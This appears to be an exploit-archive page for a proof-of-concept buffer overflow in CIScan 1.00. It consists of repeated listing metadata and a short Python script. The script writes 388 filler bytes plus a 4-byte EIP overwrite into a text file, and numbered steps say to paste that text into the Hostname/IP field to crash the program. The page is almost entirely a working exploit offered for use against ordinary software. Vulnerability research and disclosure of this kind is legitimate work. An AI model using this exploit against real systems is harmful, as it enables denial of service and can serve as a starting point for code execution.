CIScan 1.00 - Hostname/IP Field Crash PoC Vulnerability
| EKU-ID: 5534 | CVE: | OSVDB-ID: |
| Author: Irving Aguilar | Published: 2016-05-10 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 5534 | CVE: | OSVDB-ID: |
| Author: Irving Aguilar | Published: 2016-05-10 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
#!/usr/bin/env python # -*- coding: utf-8 -*- # # Exploit Title : CIScanv1.00 Hostname/IP Field Local BoF PoC # Discovery by : Irving Aguilar # Email : im.aguilar@protonmail.ch # Discovery Date : 05.05.2016 # Software Link : http://www.mcafee.com/us/downloads/free-tools/ciscan.aspx# # Tested Version : 1.00 # Vulnerability Type : Denial of Service (DoS) Local # Tested on OS : Windows 7 Enterprise SP1 x64 en # # # Steps to Produce the Crash: # 1.- Run python code : python CIScanv1-BoF.py # 2.- Open CIScanv1-BoF.txt and copy content to clipboard # 3.- Open CIScan.exe # 4.- Clic button Ok # 5.- Paste Clipboard Scan > Hostname/IP # 6.- Clic on add button (->) # 7.- Clic button Aceptar # 8.- Crashed buffer = "\x41" * 388eip = "\x42" * 4 f = open ("CIScanv1-BoF.txt", "w") f.write(buffer + eip) f.close()